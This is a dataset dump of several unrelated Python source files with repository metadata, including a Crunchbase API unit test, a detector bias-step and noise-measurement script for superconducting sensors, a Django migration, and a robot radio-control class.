A1.unitsDispl='[mm]'
A2=graphical_reports.RecordLoadCaseDisp(loadCaseName='A2',loadCaseDescr='A2: impact on parapet body',loadCaseExpr='1.0*A2',setsToDispLoads=[totalSet],setsToDispDspRot=[shells],setsToDispIntForc=[totalSet])
A2.unitsScaleLoads= 1e-3
A2.unitsScaleForc= 1e-3
A2.unitsScaleMom= 1e-3
A2.unitsScaleDispl= 1e3
A2.viewName= "-X+Y+Z"
A2.unitsDispl='[mm]'
| [
"[email protected]"
] | |
81d343fe13a8e35e1122f366e78878bab4d952e7 | 8a3401fcc24fb398e7cac0f8a67e132ed5b3fa8f | /tests/test_person.py | 43307a82a22e73117afeea3e18ab139709902ab1 | [
"MIT"
] | permissive | ngzhian/pycrunchbase | 58cf96ed20b5b3f4861bb884bcf0d9ffcf4df808 | ead7c93a51907141d687da02864a3803d1876499 | refs/heads/master | 2023-07-08T06:18:59.314695 | 2023-07-03T13:27:06 | 2023-07-03T13:27:06 | 30,629,033 | 69 | 45 | MIT | 2020-12-02T02:26:40 | 2015-02-11T03:39:14 | Python | UTF-8 | Python | false | false | 1,950 | py | from datetime import datetime
from unittest import TestCase
from pycrunchbase import Person
PERSON_DATA = {
"uuid": "uuid",
"type": "Person",
"properties": {
"permalink": "first-last",
"last_name": "Last",
"first_name": "First",
"bio": "Bio",
"role_investor": True,
"born_on": "2000-01-02",
"born_on_trust_code": 7,
"is_deceased": False,
"died_on": None,
"died_on_trust_code": 0,
"created_at": 1233271545,
"updated_at": 1419596914,
},
"relationships": {
"news": {
"cardinality": "OneToMany",
"paging": {
"total_items": 2,
"first_page_url": "https://api.crunchbase.com/v3.1/person/first-last/news",
"sort_order": "created_at DESC"
},
"items": [
{
"url": "http://example.com/news_1/",
"author": "Author 1",
"posted_on": "2012-12-28",
"type": "PressReference",
"title": "Title 1",
"created_at": 1356743058,
"updated_at": 2012
},
{
"url": "example.com/news_2/",
"author": "Author 2",
"posted_on": "2012-04-20",
"type": "PressReference",
"title": "Title 2",
"created_at": 1334962777,
"updated_at": 2012
},
]
}
}
}
class PersonTestCase(TestCase):
def test_properties(self):
person = Person(PERSON_DATA)
self.assertEqual(person.permalink, 'first-last')
self.assertEqual(person.last_name, 'Last')
self.assertEqual(person.first_name, 'First')
self.assertEqual(person.bio, 'Bio')
self.assertEqual(person.role_investor, True)
self.assertEqual(person.born_on, datetime(2000, 1, 2))
self.assertEqual(person.born_on_trust_code, 7)
self.assertEqual(person.is_deceased, False)
self.assertEqual(person.died_on, None)
self.assertEqual(person.died_on_trust_code, 0)
def test_relationships(self):
person = Person(PERSON_DATA)
self.assertIsNotNone(person.news)
self.assertEqual(2, len(person.news))
| [
"[email protected]"
] | |
94b669b4d7fd6a41c17fb8fee0444d3ccd13ebcf | d3679511615b126a199fcaf923d9613526a3d41f | /chw3k5/checklist/unversioned-yuhan/uxm_bath_iv_noise_biasstep.py | 2f7f56f6d12ab929aacf83dff9cef4a9953ea2ed | [] | no_license | simonsobs/readout-script-dev | a00850eb294ca9dea7ba11af3a8af0f7f9404fd5 | 0b002f1477efb6b5fcaddc4a282c35883165a42a | refs/heads/master | 2023-08-07T14:44:42.635388 | 2023-08-01T17:36:44 | 2023-08-01T17:36:44 | 164,685,976 | 1 | 2 | null | 2021-07-27T05:25:44 | 2019-01-08T16:08:13 | Jupyter Notebook | UTF-8 | Python | false | false | 19,011 | py | '''
Code written in Oct 2021 by Yuhan Wang
to be used through OCS
UFM testing script in Pton
takes SC noise, normal noise, IV, (noise and biasstep) at 30,50,70 percent Rn
'''
import matplotlib
matplotlib.use('Agg')
import pysmurf.client
import argparse
import numpy as np
import os
import time
import glob
from sodetlib.det_config import DetConfig
import numpy as np
from scipy.interpolate import interp1d
import argparse
import time
import csv
parser = argparse.ArgumentParser()
parser.add_argument('--slot',type=int)
parser.add_argument('--temp',type=str)
parser.add_argument('--output_file',type=str)
args = parser.parse_args()
slot_num = args.slot
bath_temp = args.temp
out_fn = args.output_file
cfg = DetConfig()
cfg.load_config_files(slot=slot_num)
S = cfg.get_smurf_control()
if slot_num == 2:
fav_tune_files = '/data/smurf_data/tune/1634501972_tune.npy'
if slot_num == 3:
fav_tune_files = '/data/smurf_data/tune/1634492357_tune.npy'
if slot_num == 4:
fav_tune_files = '/data/smurf_data/tune/1634507354_tune.npy'
if slot_num == 5:
fav_tune_files = '/data/smurf_data/tune/1633652773_tune.npy'
S.all_off()
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
S.set_mode_dc()
S.load_tune(fav_tune_files)
bands = [0,1,2,3,4,5,6,7]
for band in bands:
print('setting up band {}'.format(band))
S.set_att_dc(band,cfg.dev.bands[band]['dc_att'])
print('band {} dc_att {}'.format(band,S.get_att_dc(band)))
S.set_att_uc(band,cfg.dev.bands[band]['uc_att'])
print('band {} uc_att {}'.format(band,S.get_att_uc(band)))
S.amplitude_scale[band] = cfg.dev.bands[band]['drive']
print('band {} tone power {}'.format(band,S.amplitude_scale[band] ))
print('setting synthesis scale')
# hard coding it for the current fw
S.set_synthesis_scale(band,1)
print('running relock')
S.relock(band,tone_power=cfg.dev.bands[band]['drive'])
S.run_serial_gradient_descent(band);
S.run_serial_eta_scan(band);
print('running tracking setup')
S.set_feedback_enable(band,1)
S.tracking_setup(band,reset_rate_khz=cfg.dev.bands[band]['flux_ramp_rate_khz'],fraction_full_scale=cfg.dev.bands[band]['frac_pp'], make_plot=False, save_plot=False, show_plot=False, channel=S.which_on(band), nsamp=2**18, lms_freq_hz=None, meas_lms_freq=True,feedback_start_frac=cfg.dev.bands[band]['feedback_start_frac'],feedback_end_frac=cfg.dev.bands[band]['feedback_end_frac'],lms_gain=cfg.dev.bands[band]['lms_gain'])
print('checking tracking')
S.check_lock(band,reset_rate_khz=cfg.dev.bands[band]['flux_ramp_rate_khz'],fraction_full_scale=cfg.dev.bands[band]['frac_pp'], lms_freq_hz=None, feedback_start_frac=cfg.dev.bands[band]['feedback_start_frac'],feedback_end_frac=cfg.dev.bands[band]['feedback_end_frac'],lms_gain=cfg.dev.bands[band]['lms_gain'])
bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11]
S.set_filter_disable(0)
S.set_rtm_arb_waveform_enable(0)
S.set_downsample_factor(20)
for bias_index, bias_g in enumerate(bias_groups):
S.set_tes_bias_low_current(bias_g)
bias_v = 0
## SC noise
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
S.set_tes_bias_bipolar_array([bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,0,0,0])
time.sleep(120)
datafile_self = S.stream_data_on()
time.sleep(120)
S.stream_data_off()
fieldnames = ['bath_temp','bias_voltage', 'bias_line', 'band', 'data_path','type','note']
row = {}
row['data_path'] = datafile_self
row['bias_voltage'] = bias_v
row['type'] = 'sc noise'
row['bias_line'] = 'all'
row['band'] = 'all'
row['bath_temp'] = bath_temp
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
## Normal noise
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
S.overbias_tes_all(bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11], overbias_wait=1, tes_bias= 15, cool_wait= 3, high_current_mode=False, overbias_voltage= 5)
## sleep 6 mins to get stablized
for i in range(36):
time.sleep(10)
datafile_self = S.stream_data_on()
time.sleep(120)
S.stream_data_off()
row = {}
row['data_path'] = datafile_self
row['bias_voltage'] = 20
row['type'] = 'normal noise'
row['bias_line'] = 'all'
row['band'] = 'all'
row['bath_temp'] = bath_temp
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
##IV
bl_iv_list = []
for bias_gp in [0,1,2,3,4,5,6,7,8,9,10,11]:
row = {}
row['bath_temp'] = bath_temp
row['bias_line'] = bias_gp
row['band'] = 'all'
row['bias_voltage'] = 'IV 20 to 0'
row['type'] = 'IV'
print(f'Taking IV on bias line {bias_gp}, all band')
iv_data = S.run_iv(bias_groups = [bias_gp], wait_time=0.001, bias_high=20, bias_low=0, bias_step = 0.025, overbias_voltage=18, cool_wait=0, high_current_mode=False, make_plot=False, save_plot=True, cool_voltage = 18)
dat_file = iv_data[0:-13]+'.npy'
row['data_path'] = dat_file
bl_iv_list.append(dat_file)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
#no wave form please
S.set_rtm_arb_waveform_enable(0)
##get target v bias from IV
good_chans = 0
all_data = dict()
for ind, bl in enumerate(bias_groups):
if bl not in all_data.keys():
all_data[bl] = dict()
now = np.load(bl_iv_list[bl], allow_pickle=True).item()
# print(now[3].keys())
# print(now[0].keys())
# print(now[0][0]['R'])
for sb in [0,1,2,3,4,5,6,7]:
try:
if len(now[sb].keys()) != 0:
all_data[bl][sb] = dict()
except:
continue
# print(now[sb].keys())
for chan, d in now[sb].items():
# print(d.keys())
if (d['R'][-1] < 5e-3):
continue
elif len(np.where(d['R'] > 10e-3)[0]) > 0:
continue
# elif len(np.where(d['R'] < -2e-4)[0]) > 10:
# continue
now_chan = len(all_data[bl][sb].keys())
all_data[bl][sb][now_chan] = d
good_chans += 1
##70% Rn first
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
v_bias_all = []
RN = []
target_vbias_list = []
for bl in bias_groups:
percent_rn = 0.7
target_v_bias = []
for band in [0,1,2,3,4,5,6,7]:
try:
for ch,d in all_data[bl][band].items():
rn = d['R']/d['R_n']
cross_idx = np.where(np.logical_and(rn - percent_rn >= 0, np.roll(rn - percent_rn, 1) < 0))[0]
RN.append(d['R_n'])
target_v_bias.append(d['v_bias'][cross_idx][0])
v_bias_all.append(d['v_bias'][cross_idx][0])
except:
continue
# print(target_v_bias)
med_target_v_bias = np.median(np.array(target_v_bias))
if med_target_v_bias > 12:
target_vbias_list.append(0)
else:
target_vbias_list.append(round(med_target_v_bias,1))
target_vbias_list = np.append(target_vbias_list,[0,0,0])
S.overbias_tes_all(bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11], overbias_wait=1, tes_bias= 5, cool_wait= 3, high_current_mode=True, overbias_voltage= 5)
bias_array = np.array(target_vbias_list) / S.high_low_current_ratio
S.set_tes_bias_bipolar_array(bias_array)
print('waiting extra long for this heat to go away')
for i in range(36):
time.sleep(10)
#switch to high current mode and diable all filters
print('preparing for bias step')
S.set_downsample_factor(1)
S.set_filter_disable(1)
step_size = 0.1 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '70 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
step_size = 0.025 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '70 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
step_size = 0.01 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '70 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
#bias to low current mode target first
bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11]
S.set_tes_bias_bipolar_array(target_vbias_list)
#immediately drop to low current
S.set_tes_bias_low_current(bias_groups)
# sleep for 1 mins
for i in range(6):
time.sleep(10)
datafile_self = S.stream_data_on()
time.sleep(120)
S.stream_data_off()
row = {}
row['data_path'] = datafile_self
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = '70 percent noise low current mode'
row['bias_line'] = 'all'
row['band'] = 'all'
row['bath_temp'] = bath_temp
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
##50% Rn
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
v_bias_all = []
RN = []
target_vbias_list = []
for bl in bias_groups:
percent_rn = 0.5
target_v_bias = []
for band in [0,1,2,3,4,5,6,7]:
try:
for ch,d in all_data[bl][band].items():
rn = d['R']/d['R_n']
cross_idx = np.where(np.logical_and(rn - percent_rn >= 0, np.roll(rn - percent_rn, 1) < 0))[0]
RN.append(d['R_n'])
target_v_bias.append(d['v_bias'][cross_idx][0])
v_bias_all.append(d['v_bias'][cross_idx][0])
except:
continue
# print(target_v_bias)
med_target_v_bias = np.median(np.array(target_v_bias))
if med_target_v_bias > 12:
target_vbias_list.append(0)
else:
target_vbias_list.append(round(med_target_v_bias,1))
target_vbias_list = np.append(target_vbias_list,[0,0,0])
S.overbias_tes_all(bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11], overbias_wait=1, tes_bias= 5, cool_wait= 3, high_current_mode=True, overbias_voltage= 5)
bias_array = np.array(target_vbias_list) / S.high_low_current_ratio
S.set_tes_bias_bipolar_array(bias_array)
print('waiting extra long for this heat to go away')
for i in range(36):
time.sleep(10)
#switch to high current mode and diable all filters
print('preparing for bias step')
S.set_downsample_factor(1)
S.set_filter_disable(1)
step_size = 0.1 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '50 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
step_size = 0.025 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '50 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
step_size = 0.01 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '50 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
#bias to low current mode target first
bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11]
S.set_tes_bias_bipolar_array(target_vbias_list)
#immediately drop to low current
S.set_tes_bias_low_current(bias_groups)
# sleep for 5 mins
for i in range(36):
time.sleep(10)
datafile_self = S.stream_data_on()
time.sleep(120)
S.stream_data_off()
row = {}
row['data_path'] = datafile_self
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = '50 percent noise low current mode'
row['bias_line'] = 'all'
row['band'] = 'all'
row['bath_temp'] = bath_temp
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
##30% Rn
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
v_bias_all = []
RN = []
target_vbias_list = []
for bl in bias_groups:
percent_rn = 0.3
target_v_bias = []
for band in [0,1,2,3,4,5,6,7]:
try:
for ch,d in all_data[bl][band].items():
rn = d['R']/d['R_n']
cross_idx = np.where(np.logical_and(rn - percent_rn >= 0, np.roll(rn - percent_rn, 1) < 0))[0]
RN.append(d['R_n'])
target_v_bias.append(d['v_bias'][cross_idx][0])
v_bias_all.append(d['v_bias'][cross_idx][0])
except:
continue
# print(target_v_bias)
med_target_v_bias = np.median(np.array(target_v_bias))
if med_target_v_bias > 12:
target_vbias_list.append(0)
else:
target_vbias_list.append(round(med_target_v_bias,1))
target_vbias_list = np.append(target_vbias_list,[0,0,0])
S.overbias_tes_all(bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11], overbias_wait=1, tes_bias= 5, cool_wait= 3, high_current_mode=True, overbias_voltage= 5)
bias_array = np.array(target_vbias_list) / S.high_low_current_ratio
S.set_tes_bias_bipolar_array(bias_array)
print('waiting extra long for this heat to go away')
for i in range(30):
time.sleep(10)
#switch to high current mode and diable all filters
print('preparing for bias step')
S.set_downsample_factor(1)
S.set_filter_disable(1)
step_size = 0.1 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(1)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(1)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '30 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
step_size = 0.025 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '30 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
step_size = 0.01 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '30 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
#bias to low current mode target first
bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11]
S.set_tes_bias_bipolar_array(target_vbias_list)
#immediately drop to low current
S.set_tes_bias_low_current(bias_groups)
# sleep for 1 mins
for i in range(30):
time.sleep(10)
datafile_self = S.stream_data_on()
time.sleep(120)
S.stream_data_off()
row = {}
row['data_path'] = datafile_self
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = '30 percent noise low current mode'
row['bias_line'] = 'all'
row['band'] = 'all'
row['bath_temp'] = bath_temp
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
#turn filter back on and sample rate into 200Hz
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
| [
"[email protected]"
] | |
8d53e43ebb62761b82dede6505a974d381b4e938 | 28c0bcb13917a277cc6c8f0a34e3bb40e992d9d4 | /koku/reporting/migrations/0109_remove_ocpusagelineitemdailysummary_pod.py | 7fc341bdb4450847e431947e91154a91e5a14a73 | [
"Apache-2.0"
] | permissive | luisfdez/koku | 43a765f6ba96c2d3b2deda345573e1d97992e22f | 2979f03fbdd1c20c3abc365a963a1282b426f321 | refs/heads/main | 2023-06-22T13:19:34.119984 | 2021-07-20T12:01:35 | 2021-07-20T12:01:35 | 387,807,027 | 0 | 1 | Apache-2.0 | 2021-07-20T13:50:15 | 2021-07-20T13:50:14 | null | UTF-8 | Python | false | false | 284 | py | # Generated by Django 2.2.11 on 2020-03-27 19:21
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [("reporting", "0108_auto_20200405_1316")]
operations = [migrations.RemoveField(model_name="ocpusagelineitemdailysummary", name="pod")]
| [
"[email protected]"
] | |
30a1390b789e4bd86190b477b462d67108f7a4a3 | e1857e582609640f60923ea461da3e84c498095a | /block2-datatypes/numbers/number-demo.py | 671907978a108eb946e216b4c5cc6293cf1ca1c1 | [] | no_license | mbaeumer/python-challenge | 178f188004e66c5c4092af51ae5d496679d39dec | 4cff4a4939268a496117158b0be4e20f4d934213 | refs/heads/master | 2023-08-07T22:43:35.490777 | 2023-07-21T21:26:46 | 2023-07-21T21:26:46 | 75,015,661 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,063 | py | #!/usr/bin/python
from decimal import Decimal
from decimal import DecimalException
import random
def get_user_input():
answer = ""
while answer == "":
answer = input("Please enter a number: ")
return answer
def convert_to_int(s):
try:
print(int(s))
except ValueError:
print("Cannot convert to int")
def convert_to_float(s):
try:
print(float(s))
except ValueError:
print("Cannot convert to float")
def convert_to_decimal(s):
try:
print(Decimal(s))
except DecimalException:
print("Cannot convert to Decimal")
def determine_type(answer):
return type(answer)
# showing difference in precision of float vs decimal
def diff_decimal_float():
print("Difference between Decimal and float")
x = Decimal("0.1")
y = float("0.1")
print(f"{x:.20f}")
print(f"{y:.20f}")
def calc_with_decimals():
print("Calculating with decimals")
x = Decimal(34)
y = Decimal(7)
z = x / y
print(f"{z:.20f}")
def calc_with_floats():
print("Calculating with floats")
a = 34
b = 7
c = a/b
print(f"{c:.20f}")
def format_number(number):
print("Formatting alternatives")
print("{:.2f}".format(number))
print("{:+.2f}".format(number))
print("{:.0f}".format(number))
print("{:0>2d}".format(5))
print("{:,}".format(1000000))
print("{:.2%}".format(number))
print("{:.2e}".format(number))
print("{:10d}".format(50))
print("{:<10d}".format(50))
print("{:^10d}".format(50))
def generate_random_numbers():
random1 = random.randint(1,6) # 1..6
random2 = random.randrange(6) # 0..5
print("Generating random numbers")
print("With randint: ", random1)
print("With randrange: ", random2)
def operators_for_ints():
a = 5
b = 2
print("5/2 = %d" % (a/b))
print("5%%2 = %d" % (a%b))
print("5//2 = %d" % (a//b))
answer = get_user_input()
print(type(answer))
convert_to_int(answer)
convert_to_float(answer)
convert_to_decimal(answer)
diff_decimal_float()
calc_with_decimals()
calc_with_floats()
format_number(34/7)
generate_random_numbers()
operators_for_ints()
# TODO:
# currency
| [
"[email protected]"
] | |
08e6e9616fe6a91d63adef510f938ac99e569b81 | 9249f87109471de1fc3f3c3c1b121f51c09df683 | /lesson_3/test_10.py | 89d99c4f00ee36886084f1928bbce7ee094081ba | [] | no_license | anton1k/mfti-homework | 400a8213a57e44478d65437f5afef0432e8e84ea | 93683de329e6cb0001e713214aeb3069f6e213b0 | refs/heads/master | 2020-07-18T23:41:11.473608 | 2020-01-12T10:58:16 | 2020-01-12T10:58:16 | 206,335,501 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 652 | py | # Последовательность состоит из натуральных чисел и завершается числом 0. Всего вводится не более 10000 чисел (не считая завершающего числа 0). Определите, сколько элементов этой последовательности равны ее наибольшему элементу. Числа, следующие за числом 0, считывать не нужно.
d = 0
s = 0
while True:
x = int(input())
if x == 0:
break
if x > d:
d, s = x, 1
elif x == d:
s += 1
print(s) | [
"[email protected]"
] | |
a66ea0e584b1c0c16a1073e306b633b0ae4bd795 | 3da102290ebe6c186474ecbeec9065ea2e5357e3 | /pi/robot.py | 4d162feefe0008daae6f7e2e33d88865d9c46d45 | [] | no_license | fo-am/penelopean-robotics | 55cbbebe29f15fe5996222a5db36040ac400b8f3 | 2a6f81a4d8b098ac513bd42df980e64128df8a1b | refs/heads/master | 2022-05-28T17:46:36.579042 | 2022-05-19T13:35:47 | 2022-05-19T13:35:47 | 134,366,263 | 8 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,976 | py | import yarnasm
import radio
import time
# things we want to be able to do:
# * tweak servo defaults
# * queue of messages to send?
class robot:
def __init__(self,address):
self.address=address
self.telemetry=[0 for i in range(256)]
self.code=[]
self.source=""
self.state="running"
self.ping_time=time.time()
self.watchdog_timeout=10
self.ping_duration=2
self.start_walking=False
self.set_led=False
self.led_state=False
def pretty_print(self):
out = "robot: "+str(self.telemetry[yarnasm.registers["ROBOT_ID"]])+"\n"
out+= "pc: "+str(self.telemetry[yarnasm.registers["PC_MIRROR"]])+"\n"
out+= "a: "+str(self.telemetry[yarnasm.registers["A"]])+"\n"
out+= "step: "+str(self.telemetry[yarnasm.registers["STEP_COUNT"]])+"\n"
def telemetry_callback(self,data):
if self.state=="disconnected" or self.state=="waiting":
self.state="connected"
self.telemetry=data
#print("telemetry: "+str(self.address[4])+" "+str(data[0])+" "+str(data[9]))
self.ping_time=time.time()
def sync(self,radio,beat,ms_per_beat):
reg_sets = []
# update A register here, based on if the start flag has been set
if self.start_walking:
reg_sets+=[[yarnasm.registers["A"],1]]
self.start_walking=False
if self.set_led:
reg_sets+=[[yarnasm.registers["LED"],self.led_state]]
telemetry = radio.send_sync(self.address,beat,ms_per_beat,reg_sets)
if telemetry!=[]:
self.telemetry = telemetry
print("telemetry: "+str(self.address[4])+" "+str(self.telemetry[0])+" "+str(self.telemetry[9]))
# stop update requesting telemetry for a bit
self.ping_time=time.time()
def sync2(self,radio,beat,ms_per_beat):
reg_sets = []
radio.send_sync(self.address,beat,ms_per_beat,reg_sets)
def walk_pattern(self,pat,ms_per_step,radio):
radio.send_pattern(self.address,pat,ms_per_step)
def calibrate(self,radio,do_cali,samples,mode):
return radio.send_calibrate(self.address,do_cali,samples,mode)
def load_asm(self,fn,compiler,radio):
with open(fn, 'r') as f:
self.source=f.read()
self.code = compiler.assemble_file(fn)
return radio.send_code(self.address,self.code)
def send_asm(self,asm,compiler,radio):
self.code = compiler.assemble_bytes(asm)
return radio.send_code(self.address,self.code)
def write(self,addr,val,radio):
radio.send_set(self.address,addr,val)
def save_eeprom(self,radio):
radio.send_save_eeprom(self.address)
# A register is cleared when the robot reaches it's end position
# and set by the Pi when we are ready to start again
def start_walking_set(self):
self.start_walking=True
def led_set(self,state):
self.set_led=True
self.led_state=state
# has been set above, and returned in a telemetry packet...
def is_walking(self):
return self.telemetry[yarnasm.registers["A"]]==1
def update(self,radio):
pass
def update_regs(self,regs):
regs["state"]=self.state
regs["ping"]=time.time()-self.ping_time
regs["pc"]=self.telemetry[yarnasm.registers["PC_MIRROR"]]
regs["a"]=self.telemetry[yarnasm.registers["A"]]
regs["b"]=self.telemetry[yarnasm.registers["B"]]
regs["comp_angle"]=self.telemetry[yarnasm.registers["COMP_ANGLE"]]
regs["comp_dr"]=self.telemetry[yarnasm.registers["COMP_DELTA_RESET"]]
regs["comp_d"]=self.telemetry[yarnasm.registers["COMP_DELTA"]]
regs["step_count"]=self.telemetry[yarnasm.registers["STEP_COUNT"]]
regs["step_reset"]=self.telemetry[yarnasm.registers["STEP_COUNT_RESET"]]
regs["robot"]=self.telemetry[yarnasm.registers["ROBOT_ID"]]
| [
"[email protected]"
] | |
17ba77f176141d459e81985f43e229f7ca668faf | d6d4449df702ab59a13559aaba599c60381d1852 | /tests/rot_enc_test.py | 1a121982d07371e9b5706f6ec0329ecc102aefc0 | [
"CC-BY-4.0"
